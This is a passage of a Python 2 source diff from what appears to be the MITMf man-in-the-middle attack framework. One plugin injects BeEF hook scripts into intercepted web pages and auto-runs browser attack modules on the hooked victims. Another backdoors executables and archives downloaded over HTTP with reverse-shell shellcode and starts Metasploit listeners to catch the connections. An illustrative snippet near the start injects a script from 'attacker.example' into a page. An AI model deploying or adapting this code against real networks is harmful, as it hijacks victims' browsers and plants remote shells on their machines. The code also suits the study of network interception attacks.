        f.close()
        return self.decorate(manifest, section)

    def decorate(self, content, section):
        for i in section:
            content = content.replace("%%"+i+"%%", section[i])
        return content

    def getTemplatePrefix(self, section):
        if section.has_key('templates'):
            return self.app_config['templates_path'] + '/' + section['templates']

        return self.getDefaultTemplatePrefix()

    def getDefaultTemplatePrefix(self):
        return self.app_config['templates_path'] + '/default'

    def getManifestUrl(self, section):
        return section.get("manifest_url",'/robots.txt')

    def getSectionForUrls(self, urls):
        for url in urls:
            for i in self.app_config:
                if isinstance(self.app_config[i], dict):  #section
                    section = self.app_config[i]
                    name = i

                    if section.get('tamper_url',False) == url:
                        return (name, section, 'tamper',url)

                    if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
                        return (name, section, 'tamper',url)

                    if section.get('manifest_url',False) == url:
                        return (name, section, 'manifest',url)

                    if section.get('raw_url',False) == url:
                        return (name, section, 'raw',url)

        return (None, False,'',urls.copy().pop())
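The tamper branch of handleResponse performs two rewrites on an ordinary HTML response: it appends the decorated template before </body> and adds a manifest attribute to the <html> tag so the poisoned page registers an application cache. A small illustration with made-up HTML and section values:

import re

section = {"manifest_url": "/robots.txt"}                             # illustrative section values
appendix = '<script src="//attacker.example/payload.js"></script>'   # what a .append template might hold

data = "<html><head></head><body>hello</body></html>"
data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)
data = re.sub(re.compile("<html", re.IGNORECASE),
              '<html manifest="' + section.get("manifest_url", '/robots.txt') + '"', data)
# -> <html manifest="/robots.txt"><head></head><body>hello<script ...></script></body></html>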
127  plugins/BeefAutorun.py  Normal file
@@ -0,0 +1,127 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
import sys
import json

from time import sleep
from core.beefapi import BeefAPI
from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.Inject import Inject

mitmf_logger = logging.getLogger("mitmf")

class BeefAutorun(Inject, Plugin):
    name = "BeEFAutorun"
    optname = "beefauto"
    desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
    tree_output = []
    depends = ["Inject"]
    version = "0.3"
    has_opts = False

    def initialize(self, options):
        self.options = options
        self.ip_address = SystemConfig.getIP(options.interface)

        Inject.initialize(self, options)

        self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
        self.onConfigChange()

    def onConfigChange(self):

        beefconfig = self.config['MITMf']['BeEF']

        self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])

        self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
        if not self.beef.login(beefconfig['user'], beefconfig['pass']):
            sys.exit("[-] Error logging in to BeEF!")

    def startThread(self, options):
        self.autorun()

    def autorun(self):
        already_ran = []
        already_hooked = []

        while True:
            mode = self.config['BeEFAutorun']['mode']
            sessions = self.beef.sessions_online()
            if (sessions is not None and len(sessions) > 0):
                for session in sessions:

                    if session not in already_hooked:
                        info = self.beef.hook_info(session)
                        mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
                        already_hooked.append(session)
                        self.black_ips.append(str(info['ip']))

                    if mode == 'oneshot':
                        if session not in already_ran:
                            self.execModules(session)
                            already_ran.append(session)

                    elif mode == 'loop':
                        self.execModules(session)
                        sleep(10)

            else:
                sleep(1)

    def execModules(self, session):
        session_info = self.beef.hook_info(session)
        session_ip = session_info['ip']
        hook_browser = session_info['name']
        hook_os = session_info['os']
        all_modules = self.config['BeEFAutorun']["ALL"]
        targeted_modules = self.config['BeEFAutorun']["targets"]

        if len(all_modules) > 0:
            mitmf_logger.info("{} >> sending generic modules".format(session_ip))
            for module, options in all_modules.iteritems():
                mod_id = self.beef.module_id(module)
                resp = self.beef.module_run(session, mod_id, json.loads(options))
                if resp["success"] == 'true':
                    mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
                else:
                    mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
                sleep(0.5)

        mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
        for os in targeted_modules:
            if (os in hook_os) or (os == hook_os):
                browsers = targeted_modules[os]
                if len(browsers) > 0:
                    for browser in browsers:
                        if browser == hook_browser:
                            modules = targeted_modules[os][browser]
                            if len(modules) > 0:
                                for module, options in modules.iteritems():
                                    mod_id = self.beef.module_id(module)
                                    resp = self.beef.module_run(session, mod_id, json.loads(options))
                                    if resp["success"] == 'true':
                                        mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
                                    else:
                                        mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
                                    sleep(0.5)
129  plugins/BrowserProfiler.py  Normal file
File diff suppressed because one or more lines are too long
650  plugins/FilePwn.py  Normal file
@ -0,0 +1,650 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
#
|
||||||
|
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
#
|
||||||
|
# Copyright (c) 2013-2014, Joshua Pitts
|
||||||
|
# All rights reserved.
|
||||||
|
#
|
||||||
|
# Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
# are permitted provided that the following conditions are met:
|
||||||
|
#
|
||||||
|
# 1. Redistributions of source code must retain the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer.
|
||||||
|
#
|
||||||
|
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer in the documentation
|
||||||
|
# and/or other materials provided with the distribution.
|
||||||
|
#
|
||||||
|
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
|
# may be used to endorse or promote products derived from this software without
|
||||||
|
# specific prior written permission.
|
||||||
|
#
|
||||||
|
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
|
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
|
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
# POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
#
|
||||||
|
# Tested on Kali-Linux.
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
import pefile
|
||||||
|
import zipfile
|
||||||
|
import logging
|
||||||
|
import shutil
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
import tarfile
|
||||||
|
import multiprocessing
|
||||||
|
|
||||||
|
from libs.bdfactory import pebin
|
||||||
|
from libs.bdfactory import elfbin
|
||||||
|
from libs.bdfactory import machobin
|
||||||
|
from core.msfrpc import Msfrpc
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from tempfile import mkstemp
|
||||||
|
from configobj import ConfigObj
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class FilePwn(Plugin):
|
||||||
|
name = "FilePwn"
|
||||||
|
optname = "filepwn"
|
||||||
|
desc = "Backdoor executables being sent over http using bdfactory"
|
||||||
|
implements = ["handleResponse"]
|
||||||
|
tree_output = ["BDFProxy v0.3.2 online"]
|
||||||
|
version = "0.3"
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
|
||||||
|
self.patched = multiprocessing.Queue()
|
||||||
|
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
||||||
|
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||||
|
|
||||||
|
#USED NOW
|
||||||
|
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
||||||
|
'pe': {'number': 'MZ', 'offset': 0},
|
||||||
|
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
||||||
|
'bz': {'number': 'BZ', 'offset': 0},
|
||||||
|
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
||||||
|
'tar': {'number': 'ustar', 'offset': 257},
|
||||||
|
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
||||||
|
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
||||||
|
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
||||||
|
}
|
||||||
|
|
||||||
|
#NOT USED NOW
|
||||||
|
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
|
#FilePwn options
|
||||||
|
self.userConfig = self.config['FilePwn']
|
||||||
|
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||||
|
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||||
|
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||||
|
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
||||||
|
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
||||||
|
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
||||||
|
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
||||||
|
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
||||||
|
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
||||||
|
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
||||||
|
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||||
|
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||||
|
|
||||||
|
#Metasploit options
|
||||||
|
msfcfg = self.config['MITMf']['Metasploit']
|
||||||
|
rpcip = msfcfg['rpcip']
|
||||||
|
rpcpass = msfcfg['rpcpass']
|
||||||
|
|
||||||
|
try:
|
||||||
|
msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||||
|
msf.login('msf', rpcpass)
|
||||||
|
version = msf.call('core.version')['version']
|
||||||
|
self.tree_output.append("Connected to Metasploit v{}".format(version))
|
||||||
|
except Exception:
|
||||||
|
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||||
|
|
||||||
|
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||||
|
jobs = msf.call('job.list')
|
||||||
|
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
||||||
|
cmd = "use exploit/multi/handler\n"
|
||||||
|
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
||||||
|
cmd += "set LHOST {}\n".format(config["HOST"])
|
||||||
|
cmd += "set LPORT {}\n".format(config["PORT"])
|
||||||
|
cmd += "exploit -j\n"
|
||||||
|
|
||||||
|
if jobs:
|
||||||
|
for pid, name in jobs.iteritems():
|
||||||
|
info = msf.call('job.info', [pid])
|
||||||
|
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
|
||||||
|
#Create a virtual console
|
||||||
|
c_id = msf.call('console.create')['id']
|
||||||
|
|
||||||
|
#write the cmd to the newly created console
|
||||||
|
msf.call('console.write', [c_id, cmd])
|
||||||
|
else:
|
||||||
|
#Create a virtual console
|
||||||
|
c_id = msf.call('console.create')['id']
|
||||||
|
|
||||||
|
#write the cmd to the newly created console
|
||||||
|
msf.call('console.write', [c_id, cmd])
|
||||||
|
|
||||||
|
def onConfigChange(self):
|
||||||
|
self.initialize(self.options)
|
||||||
|
|
||||||
|
def convert_to_Bool(self, aString):
|
||||||
|
if aString.lower() == 'true':
|
||||||
|
return True
|
||||||
|
elif aString.lower() == 'false':
|
||||||
|
return False
|
||||||
|
elif aString.lower() == 'none':
|
||||||
|
return None
|
||||||
|
|
||||||
|
def bytes_have_format(self, bytess, formatt):
|
||||||
|
number = self.magicNumbers[formatt]
|
||||||
|
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def binaryGrinder(self, binaryFile):
|
||||||
|
"""
|
||||||
|
Feed potential binaries into this function,
|
||||||
|
it will return the result PatchedBinary, False, or None
|
||||||
|
"""
|
||||||
|
|
||||||
|
with open(binaryFile, 'r+b') as f:
|
||||||
|
binaryTMPHandle = f.read()
|
||||||
|
|
||||||
|
binaryHeader = binaryTMPHandle[:4]
|
||||||
|
result = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
if binaryHeader[:2] == 'MZ': # PE/COFF
|
||||||
|
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
|
||||||
|
magic = pe.OPTIONAL_HEADER.Magic
|
||||||
|
machineType = pe.FILE_HEADER.Machine
|
||||||
|
|
||||||
|
#update when supporting more than one arch
|
||||||
|
if (magic == int('20B', 16) and machineType == 0x8664 and
|
||||||
|
self.WindowsType.lower() in ['all', 'x64']):
|
||||||
|
add_section = False
|
||||||
|
cave_jumping = False
|
||||||
|
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
||||||
|
add_section = True
|
||||||
|
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.WindowsIntelx64['SHELL'],
|
||||||
|
HOST=self.WindowsIntelx64['HOST'],
|
||||||
|
PORT=int(self.WindowsIntelx64['PORT']),
|
||||||
|
ADD_SECTION=add_section,
|
||||||
|
CAVE_JUMPING=cave_jumping,
|
||||||
|
IMAGE_TYPE=self.WindowsType,
|
||||||
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||||
|
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
||||||
|
)
|
||||||
|
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif (machineType == 0x14c and
|
||||||
|
self.WindowsType.lower() in ['all', 'x86']):
|
||||||
|
add_section = False
|
||||||
|
cave_jumping = False
|
||||||
|
#add_section wins for cave_jumping
|
||||||
|
#default is single for BDF
|
||||||
|
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
||||||
|
add_section = True
|
||||||
|
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.WindowsIntelx86['SHELL'],
|
||||||
|
HOST=self.WindowsIntelx86['HOST'],
|
||||||
|
PORT=int(self.WindowsIntelx86['PORT']),
|
||||||
|
ADD_SECTION=add_section,
|
||||||
|
CAVE_JUMPING=cave_jumping,
|
||||||
|
IMAGE_TYPE=self.WindowsType,
|
||||||
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||||
|
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
||||||
|
)
|
||||||
|
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
||||||
|
|
||||||
|
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
|
targetFile.support_check()
|
||||||
|
|
||||||
|
if targetFile.class_type == 0x1:
|
||||||
|
#x86CPU Type
|
||||||
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.LinuxIntelx86['SHELL'],
|
||||||
|
HOST=self.LinuxIntelx86['HOST'],
|
||||||
|
PORT=int(self.LinuxIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
IMAGE_TYPE=self.LinuxType
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
elif targetFile.class_type == 0x2:
|
||||||
|
#x64
|
||||||
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.LinuxIntelx64['SHELL'],
|
||||||
|
HOST=self.LinuxIntelx64['HOST'],
|
||||||
|
PORT=int(self.LinuxIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
IMAGE_TYPE=self.LinuxType
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
|
targetFile.support_check()
|
||||||
|
|
||||||
|
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
||||||
|
|
||||||
|
if targetFile.FAT_FILE is True:
|
||||||
|
if self.FatPriority == 'x86':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif self.FatPriority == 'x64':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
self.patched.put(result)
|
||||||
|
return
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
print 'Exception', str(e)
|
||||||
|
mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
|
||||||
|
return None
|
||||||
|
|
||||||
|
def tar_files(self, aTarFileBytes, formatt):
|
||||||
|
"When called will unpack and edit a Tar File and return a tar file"
|
||||||
|
|
||||||
|
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
||||||
|
|
||||||
|
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||||
|
print "[!] TarFile over allowed size"
|
||||||
|
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
|
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
||||||
|
tarFileStorage.write(aTarFileBytes)
|
||||||
|
tarFileStorage.flush()
|
||||||
|
|
||||||
|
if not tarfile.is_tarfile(tarFileStorage.name):
|
||||||
|
print '[!] Not a tar file'
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
|
compressionMode = ':'
|
||||||
|
if formatt == 'gz':
|
||||||
|
compressionMode = ':gz'
|
||||||
|
if formatt == 'bz':
|
||||||
|
compressionMode = ':bz2'
|
||||||
|
|
||||||
|
tarFile = None
|
||||||
|
try:
|
||||||
|
tarFileStorage.seek(0)
|
||||||
|
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
||||||
|
except tarfile.ReadError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if tarFile is None:
|
||||||
|
print '[!] Not a tar file'
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
|
print '[*] Tar file contents and info:'
|
||||||
|
print '[*] Compression:', formatt
|
||||||
|
|
||||||
|
members = tarFile.getmembers()
|
||||||
|
for info in members:
|
||||||
|
print "\t", info.name, info.mtime, info.size
|
||||||
|
|
||||||
|
newTarFileStorage = tempfile.NamedTemporaryFile()
|
||||||
|
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
||||||
|
|
||||||
|
patchCount = 0
|
||||||
|
wasPatched = False
|
||||||
|
|
||||||
|
for info in members:
|
||||||
|
print "[*] >>> Next file in tarfile:", info.name
|
||||||
|
|
||||||
|
if not info.isfile():
|
||||||
|
print info.name, 'is not a file'
|
||||||
|
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
if info.size >= long(self.FileSizeMax):
|
||||||
|
print info.name, 'is too big'
|
||||||
|
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Check against keywords
|
||||||
|
keywordCheck = False
|
||||||
|
|
||||||
|
if type(self.tarblacklist) is str:
|
||||||
|
if self.tarblacklist.lower() in info.name.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
|
||||||
|
else:
|
||||||
|
for keyword in self.tarblacklist:
|
||||||
|
if keyword.lower() in info.name.lower():
|
||||||
|
keywordCheck = True
|
||||||
|
continue
|
||||||
|
|
||||||
|
if keywordCheck is True:
|
||||||
|
print "[!] Tar blacklist enforced!"
|
||||||
|
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Try to patch
|
||||||
|
extractedFile = tarFile.extractfile(info)
|
||||||
|
|
||||||
|
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
||||||
|
newTarFile.addfile(info, extractedFile)
|
||||||
|
else:
|
||||||
|
# create the file on disk temporarily for fileGrinder to run on it
|
||||||
|
with tempfile.NamedTemporaryFile() as tmp:
|
||||||
|
shutil.copyfileobj(extractedFile, tmp)
|
||||||
|
tmp.flush()
|
||||||
|
patchResult = self.binaryGrinder(tmp.name)
|
||||||
|
if patchResult:
|
||||||
|
patchCount += 1
|
||||||
|
file2 = "backdoored/" + os.path.basename(tmp.name)
|
||||||
|
print "[*] Patching complete, adding to tar file."
|
||||||
|
info.size = os.stat(file2).st_size
|
||||||
|
with open(file2, 'rb') as f:
|
||||||
|
newTarFile.addfile(info, f)
|
||||||
|
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
||||||
|
os.remove(file2)
|
||||||
|
wasPatched = True
|
||||||
|
else:
|
||||||
|
print "[!] Patching failed"
|
||||||
|
with open(tmp.name, 'rb') as f:
|
||||||
|
newTarFile.addfile(info, f)
|
||||||
|
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
||||||
|
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||||
|
mitmf_logger.info("Met Tar config patchCount limit.")
|
||||||
|
|
||||||
|
# finalize the writing of the tar file first
|
||||||
|
newTarFile.close()
|
||||||
|
|
||||||
|
# then read the new tar file into memory
|
||||||
|
newTarFileStorage.seek(0)
|
||||||
|
ret = newTarFileStorage.read()
|
||||||
|
newTarFileStorage.close() # it's automatically deleted
|
||||||
|
|
||||||
|
if wasPatched is False:
|
||||||
|
# If nothing was changed return the original
|
||||||
|
print "[*] No files were patched forwarding original file"
|
||||||
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
self.patched.put(ret)
|
||||||
|
return
|
||||||
|
|
||||||
|
def zip_files(self, aZipFile):
|
||||||
|
"When called will unpack and edit a Zip File and return a zip file"
|
||||||
|
|
||||||
|
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
||||||
|
|
||||||
|
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||||
|
print "[!] ZipFile over allowed size"
|
||||||
|
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
||||||
|
self.patched.put(aZipFile)
|
||||||
|
return
|
||||||
|
|
||||||
|
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
||||||
|
tmpDir = '/tmp/' + tmpRan
|
||||||
|
tmpFile = '/tmp/' + tmpRan + '.zip'
|
||||||
|
|
||||||
|
os.mkdir(tmpDir)
|
||||||
|
|
||||||
|
with open(tmpFile, 'w') as f:
|
||||||
|
f.write(aZipFile)
|
||||||
|
|
||||||
|
zippyfile = zipfile.ZipFile(tmpFile, 'r')
|
||||||
|
|
||||||
|
#encryption test
|
||||||
|
try:
|
||||||
|
zippyfile.testzip()
|
||||||
|
|
||||||
|
except RuntimeError as e:
|
||||||
|
if 'encrypted' in str(e):
|
||||||
|
mitmf_logger.info('Encrypted zipfile found. Not patching.')
|
||||||
|
return aZipFile
|
||||||
|
|
||||||
|
print "[*] ZipFile contents and info:"
|
||||||
|
|
||||||
|
for info in zippyfile.infolist():
|
||||||
|
print "\t", info.filename, info.date_time, info.file_size
|
